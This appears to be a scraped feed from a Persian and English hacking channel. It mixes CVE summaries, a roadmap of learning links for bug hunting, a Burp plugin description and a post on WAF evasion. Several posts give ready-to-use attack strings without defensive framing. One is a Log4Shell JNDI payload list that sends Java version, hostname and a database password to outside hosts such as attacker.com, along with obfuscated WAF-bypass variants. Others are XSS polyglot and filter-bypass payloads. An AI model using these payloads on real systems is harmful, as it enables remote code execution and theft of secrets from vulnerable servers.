🔴 CVE
CVE-2023-48382
Softnext Mail SQR Expert
یک پلتفرم مدیریت ایمیل است که دارای یک آسیبپذیری Local File Inclusion (LFI) در URL مربوط به تحویل ایمیل است. یک مهاجم ازراه دور تأیید نشده میتواند از این آسیبپذیری برای اجرای فایل PHP دلخواه با پسوند فایل .asp در مسیرهای خاص سیستم، برای دسترسی و اصلاح اطلاعات جزئی سیستم سوء استفاده کند، اما در دسترس بودن سرویس تأثیری ندارد.
LINK
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
CVE-2023-48382
Softnext Mail SQR Expert
یک پلتفرم مدیریت ایمیل است که دارای یک آسیبپذیری Local File Inclusion (LFI) در URL مربوط به تحویل ایمیل است. یک مهاجم ازراه دور تأیید نشده میتواند از این آسیبپذیری برای اجرای فایل PHP دلخواه با پسوند فایل .asp در مسیرهای خاص سیستم، برای دسترسی و اصلاح اطلاعات جزئی سیستم سوء استفاده کند، اما در دسترس بودن سرویس تأثیری ندارد.
LINK
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
⚡2
🔴 CVE
CVE-2024-0728
LFI
A vulnerability classified as problematic was found in ForU CMS up to 2020-06-23. Affected by this vulnerability is an unknown functionality of the file channel.php. The manipulation of the argument c_cmodel leads to file inclusion. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251551.
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
CVE-2024-0728
LFI
A vulnerability classified as problematic was found in ForU CMS up to 2020-06-23. Affected by this vulnerability is an unknown functionality of the file channel.php. The manipulation of the argument c_cmodel leads to file inclusion. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251551.
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
👍2
🔴CVE
CVE-2024-22859
آسیبپذیری Cross-Site Request Forgery (CSRF) در livewire قبل از نسخه 3.0.4، به مهاجمان راه دور اجازه میدهد تا تابع getCsrfToken کد دلخواه را اجرا کنند. توجه: فروشنده با این موضوع مخالفت می کند زیرا commit 5d88731 یک مشکل قابلیت استفاده (کدهای وضعیت HTTP 419 برای فعالیت مشتری قانونی) را برطرف می کند، نه یک مشکل امنیتی.
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
CVE-2024-22859
آسیبپذیری Cross-Site Request Forgery (CSRF) در livewire قبل از نسخه 3.0.4، به مهاجمان راه دور اجازه میدهد تا تابع getCsrfToken کد دلخواه را اجرا کنند. توجه: فروشنده با این موضوع مخالفت می کند زیرا commit 5d88731 یک مشکل قابلیت استفاده (کدهای وضعیت HTTP 419 برای فعالیت مشتری قانونی) را برطرف می کند، نه یک مشکل امنیتی.
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
GitHub
[GHSA-2cjh-75gp-34gc] livewire Cross-Site Request Forgery vulnerability by valorin · Pull Request #3490 · github/advisory-database
Updates
Affected products
CVSS
Severity
Comments
This does not appear to be an actual vulnerability.
The referenced commit is fixing a CSRF expiring issue, which was causing 419 errors and I cann...
Affected products
CVSS
Severity
Comments
This does not appear to be an actual vulnerability.
The referenced commit is fixing a CSRF expiring issue, which was causing 419 errors and I cann...
🔴 Log4Shell
CVE-2021-44228 Log4Shell
🔴 Apache Log4j2 <=2.14.1
Payloads
Java
# Identify Java version and hostname
${jndi:ldap://${java:version}.domain/a}
${jndi:ldap://${env:JAVA_VERSION}.domain/a}
${jndi:ldap://${sys:java.version}.domain/a}
${jndi:ldap://${sys:java.vendor}.domain/a}
${jndi:ldap://${hostName}.domain/a}
${jndi:dns://${hostName}.domain}
# More enumerations keywords and variables
java:os
docker:containerId
web:rootDir
bundle:config:db.password
🔴WAF Bypass
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://127.0.0.1:1389/a}
# using lower and upper
${${lower:jndi}:${lower:rmi}://127.0.0.1:1389/poc}
${j${loWer:Nd}i${uPper::}://127.0.0.1:1389/poc}
${jndi:${lower:l}${lower:d}a${lower:p}://loc${upper:a}lhost:1389/rce}
# using env to create the letter
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//your.burpcollaborator.net/a}
${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attacker.com/a}
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
CVE-2021-44228 Log4Shell
🔴 Apache Log4j2 <=2.14.1
Payloads
Java
# Identify Java version and hostname
${jndi:ldap://${java:version}.domain/a}
${jndi:ldap://${env:JAVA_VERSION}.domain/a}
${jndi:ldap://${sys:java.version}.domain/a}
${jndi:ldap://${sys:java.vendor}.domain/a}
${jndi:ldap://${hostName}.domain/a}
${jndi:dns://${hostName}.domain}
# More enumerations keywords and variables
java:os
docker:containerId
web:rootDir
bundle:config:db.password
🔴WAF Bypass
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://127.0.0.1:1389/a}
# using lower and upper
${${lower:jndi}:${lower:rmi}://127.0.0.1:1389/poc}
${j${loWer:Nd}i${uPper::}://127.0.0.1:1389/poc}
${jndi:${lower:l}${lower:d}a${lower:p}://loc${upper:a}lhost:1389/rce}
# using env to create the letter
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//your.burpcollaborator.net/a}
${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attacker.com/a}
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
Attacker
Attacker - The Domain Name Attacker.com is Now For Sale.
Attacker.com is now for sale, lease or rent. Smart domain names compound conversion rates and this domain name for Attacker marketing is a wise investment.
⚡2
🔴 MEDIUM
Web Application Firewall (WAF) Evasion Techniques
🔴 LINK
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
Web Application Firewall (WAF) Evasion Techniques
🔴 LINK
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
Medium
Web Application Firewall (WAF) Evasion Techniques
I can read your passwd file with: “/???/??t /???/??ss??”. Having fun with Sucuri WAF, ModSecurity, Paranoia Level and more…
❤1
بایپس باگ XSS
<A
HREF="http://66.102.7.147/">XSS</A>0\"autofocus/onfocus=alert(1)--><video/poster/ error=prompt(2)>"-confirm(3)-"veris-->group<svg/onload=alert(/XSS/)//#"><img src=M onerror=alert('XSS');>
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
<A
HREF="http://66.102.7.147/">XSS</A>0\"autofocus/onfocus=alert(1)--><video/poster/ error=prompt(2)>"-confirm(3)-"veris-->group<svg/onload=alert(/XSS/)//#"><img src=M onerror=alert('XSS');>
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
🔥2
Git Hub 🐈
Tools bypass
Gema
Neam :
FabricBlockedServersBypass
Link
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
Tools bypass
Gema
Neam :
FabricBlockedServersBypass
Link
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
GitHub
GitHub - svenar-nl/FabricBlockedServersBypass: Is a server you play on blocked by Mojang? Use this fabric mod to bypass it!
Is a server you play on blocked by Mojang? Use this fabric mod to bypass it! - svenar-nl/FabricBlockedServersBypass
❤1
🔴 XSS
Payload: "><A%20%252F=""Href=%20JavaScript:k=%27a%27,topk%2B%27lert%27>
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
Payload: "><A%20%252F=""Href=%20JavaScript:k=%27a%27,topk%2B%27lert%27>
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
❤2
🔴Ethical-hacking-Roadmap & bug hunting RoadmapKasraone
Computer Fundamentals
https://www.comptia.org/training/by-certification/a
https://www.youtube.com/watch?v=tIfRDPekybU
https://www.tutorialspoint.com/computer_fundamentals/index.htm
https://onlinecourses.swayam2.ac.in/cec19_cs06/preview
https://www.udemy.com/course/complete-computer-basics-course/
https://www.coursera.org/courses?query=computer%20fundamentals
Computer Networking
https://www.youtube.com/watch?v=0AcpUwnc12E&list=PLkW9FMxqUvyZaSQNQslneeODER3bJCb2K
https://www.youtube.com/watch?v=qiQR5rTSshw -https://www.youtube.com/watch?v=L3ZzkOTDins
https://www.udacity.com/course/computer-networking--ud436
https://www.coursera.org/professional-certificates/google-it-support
https://www.udemy.com/course/introduction-to-computer-networks/
NetworkChuck: https://www.youtube.com/c/NetworkChuck
Operating Systems
https://www.youtube.com/watch?v=z2r-p7xc7c4
https://www.youtube.com/watch?v=_tCY-c-sPZc
https://www.coursera.org/learn/os-power-user
https://www.udacity.com/course/introduction-to-operating-systems--ud923
https://www.udemy.com/course/linux-command-line-volume1/
https://www.youtube.com/watch?v=v_1zB2WNN14
Command Line
Windows:
https://www.youtube.com/watch?v=TBBbQKp9cKw&list=PLRu7mEBdW7fDTarQ0F2k2tpwCJg_hKhJQ
https://www.youtube.com/watch?v=fid6nfvCz1I&list=PLRu7mEBdW7fDlf80vMmEJ4Vw9uf2Gbyc_
https://www.youtube.com/watch?v=UVUd9_k9C6A
Linux:
https://www.youtube.com/watch?v=fid6nfvCz1I&list=PLRu7mEBdW7fDlf80vMmEJ4Vw9uf2Gbyc_
https://www.youtube.com/watch?v=UVUd9_k9C6A -
https://www.youtube.com/watch?v=GtovwKDemnI
https://www.youtube.com/watch?v=2PGnYjbYuUo
https://www.youtube.com/watch?v=e7BufAVwDiM&t=418s
https://www.youtube.com/watch?v=bYRfRGbqDIw&list=PLkPmSWtWNIyTQ1NX6MarpjHPkLUs3u1wG&index=4
Programming
C
https://www.youtube.com/watch?v=irqbmMNs2Bo
https://www.youtube.com/watch?v=ZSPZob_1TOk
https://www.programiz.com/c-programming
Python
https://www.youtube.com/watch?v=ZLga4doUdjY&t=30352s
https://www.youtube.com/watch?v=gfDE2a7MKjA
https://www.youtube.com/watch?v=eTyI-M50Hu4
JavaScript
https://www.youtube.com/watch?v=-lCF2t6iuUc
https://www.youtube.com/watch?v=hKB-YGF14SY&t=1486s
https://www.youtube.com/watch?v=jS4aFq5-91M
PHP
https://www.youtube.com/watch?v=1SnPKhCdlsU
https://www.youtube.com/watch?v=OK_JCtrrv-c
https://www.youtube.com/watch?v=T8SEGXzdbYg&t=1329s
Where to learn from?
Books
Web Application Hacker's Handbook: https://www.amazon.com/Web-Application-Hackers-Handbook-Exploiting/dp/1118026470
Real World Bug Hunting: https://www.amazon.in/Real-World-Bug-Hunting-Field-Hacking-ebook/dp/B072SQZ2LG
Bug Bounty Hunting Essentials: https://www.amazon.in/Bug-Bounty-Hunting-Essentials-Quick-paced-ebook/dp/B079RM344H
Bug Bounty Bootcamp: https://www.amazon.in/Bug-Bounty-Bootcamp-Reporting-Vulnerabilities-ebook/dp/B08YK368Y3
Hands on Bug Hunting: https://www.amazon.in/Hands-Bug-Hunting-Penetration-Testers-ebook/dp/B07DTF2VL6
Hacker's Playbook 3: https://www.amazon.in/Hacker-Playbook-Practical-Penetration-Testing/dp/1980901759
OWASP Testing Guide: https://www.owasp.org/index.php/OWASP_Testing_Project
Web Hacking 101: https://www.pdfdrive.com/web-hacking-101-e26570613.html
OWASP Mobile Testing Guide :https://www.owasp.org/index.php/OWASP_Mobile_Security_Testing_Guide
Writeups
Medium: https://medium.com/analytics-vidhya/a-beginners-guide-to-cyber-security-3d0f7891c93a
Infosec Writeups: https://infosecwriteups.com/?gi=3149891cc73d
Hackerone Hacktivity: https://hackerone.com/hacktivity
Google VRP Writeups: https://github.com/xdavidhu/awesome-google-vrp-writeups
Blogs and Articles
Hacking Articles: https://www.hackingarticles.in/
Vickie Li Blogs: https://vickieli.dev/
Bugcrowd Blogs: https://www.bugcrowd.com/blog/
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
Computer Fundamentals
https://www.comptia.org/training/by-certification/a
https://www.youtube.com/watch?v=tIfRDPekybU
https://www.tutorialspoint.com/computer_fundamentals/index.htm
https://onlinecourses.swayam2.ac.in/cec19_cs06/preview
https://www.udemy.com/course/complete-computer-basics-course/
https://www.coursera.org/courses?query=computer%20fundamentals
Computer Networking
https://www.youtube.com/watch?v=0AcpUwnc12E&list=PLkW9FMxqUvyZaSQNQslneeODER3bJCb2K
https://www.youtube.com/watch?v=qiQR5rTSshw -https://www.youtube.com/watch?v=L3ZzkOTDins
https://www.udacity.com/course/computer-networking--ud436
https://www.coursera.org/professional-certificates/google-it-support
https://www.udemy.com/course/introduction-to-computer-networks/
NetworkChuck: https://www.youtube.com/c/NetworkChuck
Operating Systems
https://www.youtube.com/watch?v=z2r-p7xc7c4
https://www.youtube.com/watch?v=_tCY-c-sPZc
https://www.coursera.org/learn/os-power-user
https://www.udacity.com/course/introduction-to-operating-systems--ud923
https://www.udemy.com/course/linux-command-line-volume1/
https://www.youtube.com/watch?v=v_1zB2WNN14
Command Line
Windows:
https://www.youtube.com/watch?v=TBBbQKp9cKw&list=PLRu7mEBdW7fDTarQ0F2k2tpwCJg_hKhJQ
https://www.youtube.com/watch?v=fid6nfvCz1I&list=PLRu7mEBdW7fDlf80vMmEJ4Vw9uf2Gbyc_
https://www.youtube.com/watch?v=UVUd9_k9C6A
Linux:
https://www.youtube.com/watch?v=fid6nfvCz1I&list=PLRu7mEBdW7fDlf80vMmEJ4Vw9uf2Gbyc_
https://www.youtube.com/watch?v=UVUd9_k9C6A -
https://www.youtube.com/watch?v=GtovwKDemnI
https://www.youtube.com/watch?v=2PGnYjbYuUo
https://www.youtube.com/watch?v=e7BufAVwDiM&t=418s
https://www.youtube.com/watch?v=bYRfRGbqDIw&list=PLkPmSWtWNIyTQ1NX6MarpjHPkLUs3u1wG&index=4
Programming
C
https://www.youtube.com/watch?v=irqbmMNs2Bo
https://www.youtube.com/watch?v=ZSPZob_1TOk
https://www.programiz.com/c-programming
Python
https://www.youtube.com/watch?v=ZLga4doUdjY&t=30352s
https://www.youtube.com/watch?v=gfDE2a7MKjA
https://www.youtube.com/watch?v=eTyI-M50Hu4
JavaScript
https://www.youtube.com/watch?v=-lCF2t6iuUc
https://www.youtube.com/watch?v=hKB-YGF14SY&t=1486s
https://www.youtube.com/watch?v=jS4aFq5-91M
PHP
https://www.youtube.com/watch?v=1SnPKhCdlsU
https://www.youtube.com/watch?v=OK_JCtrrv-c
https://www.youtube.com/watch?v=T8SEGXzdbYg&t=1329s
Where to learn from?
Books
Web Application Hacker's Handbook: https://www.amazon.com/Web-Application-Hackers-Handbook-Exploiting/dp/1118026470
Real World Bug Hunting: https://www.amazon.in/Real-World-Bug-Hunting-Field-Hacking-ebook/dp/B072SQZ2LG
Bug Bounty Hunting Essentials: https://www.amazon.in/Bug-Bounty-Hunting-Essentials-Quick-paced-ebook/dp/B079RM344H
Bug Bounty Bootcamp: https://www.amazon.in/Bug-Bounty-Bootcamp-Reporting-Vulnerabilities-ebook/dp/B08YK368Y3
Hands on Bug Hunting: https://www.amazon.in/Hands-Bug-Hunting-Penetration-Testers-ebook/dp/B07DTF2VL6
Hacker's Playbook 3: https://www.amazon.in/Hacker-Playbook-Practical-Penetration-Testing/dp/1980901759
OWASP Testing Guide: https://www.owasp.org/index.php/OWASP_Testing_Project
Web Hacking 101: https://www.pdfdrive.com/web-hacking-101-e26570613.html
OWASP Mobile Testing Guide :https://www.owasp.org/index.php/OWASP_Mobile_Security_Testing_Guide
Writeups
Medium: https://medium.com/analytics-vidhya/a-beginners-guide-to-cyber-security-3d0f7891c93a
Infosec Writeups: https://infosecwriteups.com/?gi=3149891cc73d
Hackerone Hacktivity: https://hackerone.com/hacktivity
Google VRP Writeups: https://github.com/xdavidhu/awesome-google-vrp-writeups
Blogs and Articles
Hacking Articles: https://www.hackingarticles.in/
Vickie Li Blogs: https://vickieli.dev/
Bugcrowd Blogs: https://www.bugcrowd.com/blog/
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
www.comptia.org
A+ Certification | CompTIA
Begin your tech career with CompTIA A+, the go-to certification for IT support roles. Opt for V15 to access the latest content or complete V14 before it retires on September 25, 2025.
❤4👍1
🔴دور زدن WAF وب سایت
خوب سلام درود
به تمامی کاربران عزیز کسری وان امیدوارم حالتون عالی باشه این بار میخواهیم درباره دورزدن WAF وب سایت صحبت کنیم
حمایت یادتون نره
برای دور زدن WAF (Web Application Firewall) یک وب سایت، باید اقدامات امنیتی خاصی را انجام دهید. البته توجه داشته باشید که دور زدن WAF یک فعالیت غیرقانونی است و ممکن است منجر به پیامدهای قانونی شدیدی شود. در اینجا توضیحاتی برای اهداف آموزشی ارائه میشود:
1. استفاده از تکنیکهای مخرب: برخی حملات مانند حملات از نوع SQL Injection، Cross-Site Scripting (XSS)، و Command Injection میتوانند به شما کمک کنند تا WAF را دور بزنید. با این حال، توجه داشته باشید که انجام این حملات تخلف قانونی است.
2. استفاده از تغییر IP: اگر IP شما در لیست سیاه WAF قرار گرفته است، میتوانید از VPN یا پروکسی استفاده کنید تا آدرس IP خود را تغییر دهید و به وب سایت دسترسی پیدا کنید.
3. استفاده از پروکسیهای متحرک: برخی پروکسیها و تکنولوژیهای مشابه میتوانند به شما کمک کنند تا WAF را دور بزنید.
4. شناسایی ضعفهای WAF: با بررسی نحوه عملکرد WAF و شناسایی ضعفهای آن، ممکن است بتوانید روشهای دور زدن را پیدا کنید.
5استفاده از سینتکس JSON در payloadهای تزریقی SQL میتواند به شما کمک کند تا WAF را دور بزنید. زیرا بسیاری از WAFها برای تشخیص حملات SQLi به دنبال الگوهای خاصی میگردند که در payloadهای SQLi وجود دارد. با اضافه کردن سینتکس JSON به payload، ممکن است WAF نتواند به درستی تشخیص حمله را انجام دهد و اجازه ورود payload به سیستم را بدهد.
توجه داشته باشید که دور زدن WAF یک عمل غیرقانونی است و ممکن است به شما مشکلات قانونی و امنیتی جدی وارد کند. بهترین راه برای حفظ امنیت وب سایت خود، استفاده از روشهای امنیتی قوی و همچنین همکاری با تیم امنیت اطلاعات خود است.
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
خوب سلام درود
به تمامی کاربران عزیز کسری وان امیدوارم حالتون عالی باشه این بار میخواهیم درباره دورزدن WAF وب سایت صحبت کنیم
حمایت یادتون نره
برای دور زدن WAF (Web Application Firewall) یک وب سایت، باید اقدامات امنیتی خاصی را انجام دهید. البته توجه داشته باشید که دور زدن WAF یک فعالیت غیرقانونی است و ممکن است منجر به پیامدهای قانونی شدیدی شود. در اینجا توضیحاتی برای اهداف آموزشی ارائه میشود:
1. استفاده از تکنیکهای مخرب: برخی حملات مانند حملات از نوع SQL Injection، Cross-Site Scripting (XSS)، و Command Injection میتوانند به شما کمک کنند تا WAF را دور بزنید. با این حال، توجه داشته باشید که انجام این حملات تخلف قانونی است.
2. استفاده از تغییر IP: اگر IP شما در لیست سیاه WAF قرار گرفته است، میتوانید از VPN یا پروکسی استفاده کنید تا آدرس IP خود را تغییر دهید و به وب سایت دسترسی پیدا کنید.
3. استفاده از پروکسیهای متحرک: برخی پروکسیها و تکنولوژیهای مشابه میتوانند به شما کمک کنند تا WAF را دور بزنید.
4. شناسایی ضعفهای WAF: با بررسی نحوه عملکرد WAF و شناسایی ضعفهای آن، ممکن است بتوانید روشهای دور زدن را پیدا کنید.
5استفاده از سینتکس JSON در payloadهای تزریقی SQL میتواند به شما کمک کند تا WAF را دور بزنید. زیرا بسیاری از WAFها برای تشخیص حملات SQLi به دنبال الگوهای خاصی میگردند که در payloadهای SQLi وجود دارد. با اضافه کردن سینتکس JSON به payload، ممکن است WAF نتواند به درستی تشخیص حمله را انجام دهد و اجازه ورود payload به سیستم را بدهد.
توجه داشته باشید که دور زدن WAF یک عمل غیرقانونی است و ممکن است به شما مشکلات قانونی و امنیتی جدی وارد کند. بهترین راه برای حفظ امنیت وب سایت خود، استفاده از روشهای امنیتی قوی و همچنین همکاری با تیم امنیت اطلاعات خود است.
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
❤3👍2⚡1
دوستان به دلیل اینکه کاربران خارجی پیام دادند
که پست ها به زبان انگلیسی بزاریم به نظره شما
اینطور باشد
نظره خود را با ما در میان بگذارید ممنون ❤
که پست ها به زبان انگلیسی بزاریم به نظره شما
اینطور باشد
نظره خود را با ما در میان بگذارید ممنون ❤
👍6⚡1
پست جدید حمایت یادتون نره ممنون
https://vrgl.ir/PHnLd
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
https://vrgl.ir/PHnLd
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
ویرگول
حمله از راه دور به سبک Stuxnet با بدافزار PLC مبتنی بر وب امکان پذیر است - ویرگول
تیمی از محققان بدافزاری را طراحی کردهاند که برای هدف قرار دادن کنترلکنندههای منطقی قابل برنامهریزی مدرن (PLC) طراحی شده است تا نشان دهد…
⚡2👍1🎉1
🔴 CVE
CVE-2024-1750
یک آسیب پذیری که به عنوان بحرانی طبقه بندی شده بود، در TemmokuMVC تا 2.3 یافت شد.
تابع get_img_url/img_replace
در کتابخانه lib/images_get_down.php کامپوننت Image Download Handler تحت تأثیر قرار گرفته است. دستکاری منجر به سریال زدایی می شود. امکان انجام حمله از راه دور وجود دارد. پیچیدگی یک حمله نسبتاً زیاد است. گفته می شود که قابلیت بهره برداری دشوار است. این سوء استفاده برای عموم فاش شده است و ممکن است مورد استفاده قرار گیرد. شناسه این آسیب پذیری VDB-254532 است.
توجه: با فروشنده در مورد این افشای اولیه تماس گرفته شد اما به هیچ وجه پاسخ نداد.
این آسیب پذیری قابل بهره برداری از راه دور است و پیچیدگی حمله نسبتاً زیاد است
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
CVE-2024-1750
یک آسیب پذیری که به عنوان بحرانی طبقه بندی شده بود، در TemmokuMVC تا 2.3 یافت شد.
تابع get_img_url/img_replace
در کتابخانه lib/images_get_down.php کامپوننت Image Download Handler تحت تأثیر قرار گرفته است. دستکاری منجر به سریال زدایی می شود. امکان انجام حمله از راه دور وجود دارد. پیچیدگی یک حمله نسبتاً زیاد است. گفته می شود که قابلیت بهره برداری دشوار است. این سوء استفاده برای عموم فاش شده است و ممکن است مورد استفاده قرار گیرد. شناسه این آسیب پذیری VDB-254532 است.
توجه: با فروشنده در مورد این افشای اولیه تماس گرفته شد اما به هیچ وجه پاسخ نداد.
این آسیب پذیری قابل بهره برداری از راه دور است و پیچیدگی حمله نسبتاً زیاد است
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
❤1⚡1
ActiveScan++
ActiveScan++ extends Burp Suite's active and passive scanning capabilities. Designed to add minimal network overhead, it identifies application behaviour that may be of interest to advanced testers:
Potential host header attacks (password reset poisoning, cache poisoning, DNS rebinding)
Edge Side Includes
XML input handling
Suspicious input transformation (eg 7*7 => '49', \\ => '\' )
Passive-scanner issues that only occur during fuzzing (install the 'Error Message Checks' extension for maximum effectiveness)
ActiveScan++
قابلیت های اسکن فعال و غیرفعال Burp Suite را گسترش می دهد. این برنامه برای اضافه کردن حداقل هزینه های شبکه طراحی شده است و رفتار برنامه ای را که ممکن است برای تست کنندگان پیشرفته جالب باشد ، شناسایی می کند:
حملات هدر میزبان بالقوه (مسمومیت با تنظیم مجدد رمز عبور ، مسمومیت با حافظه پنهان، پیوند مجدد DNS)
لبه سمت شامل
مدیریت ورودی XML
تبدیل ورودی مشکوک (به عنوان مثال 7*7 => '49', \\ => '\' )
مشکلات اسکنر غیرفعال که فقط در طول فازینگ رخ می دهد (برای حداکثر اثربخشی ، افزونه "بررسی پیام خطا" را نصب کنید)
LINK TOOLS
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
ActiveScan++ extends Burp Suite's active and passive scanning capabilities. Designed to add minimal network overhead, it identifies application behaviour that may be of interest to advanced testers:
Potential host header attacks (password reset poisoning, cache poisoning, DNS rebinding)
Edge Side Includes
XML input handling
Suspicious input transformation (eg 7*7 => '49', \\ => '\' )
Passive-scanner issues that only occur during fuzzing (install the 'Error Message Checks' extension for maximum effectiveness)
ActiveScan++
قابلیت های اسکن فعال و غیرفعال Burp Suite را گسترش می دهد. این برنامه برای اضافه کردن حداقل هزینه های شبکه طراحی شده است و رفتار برنامه ای را که ممکن است برای تست کنندگان پیشرفته جالب باشد ، شناسایی می کند:
حملات هدر میزبان بالقوه (مسمومیت با تنظیم مجدد رمز عبور ، مسمومیت با حافظه پنهان، پیوند مجدد DNS)
لبه سمت شامل
مدیریت ورودی XML
تبدیل ورودی مشکوک (به عنوان مثال 7*7 => '49', \\ => '\' )
مشکلات اسکنر غیرفعال که فقط در طول فازینگ رخ می دهد (برای حداکثر اثربخشی ، افزونه "بررسی پیام خطا" را نصب کنید)
LINK TOOLS
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
GitHub
GitHub - albinowax/ActiveScanPlusPlus: ActiveScan++ Burp Suite Plugin
ActiveScan++ Burp Suite Plugin. Contribute to albinowax/ActiveScanPlusPlus development by creating an account on GitHub.
👍8🎉7👏6❤4🔥4🥰3⚡2
🔴 XSS
CVE-2024-27959
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Wpexpertsio WC Shop Sync – Integrate Square and WooCommerce for Seamless Shop Management allows Reflected XSS.This issue affects WC Shop Sync – Integrate Square and WooCommerce for Seamless Shop Management: from n/a through 4.2.9.
LINK
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
CVE-2024-27959
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Wpexpertsio WC Shop Sync – Integrate Square and WooCommerce for Seamless Shop Management allows Reflected XSS.This issue affects WC Shop Sync – Integrate Square and WooCommerce for Seamless Shop Management: from n/a through 4.2.9.
LINK
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
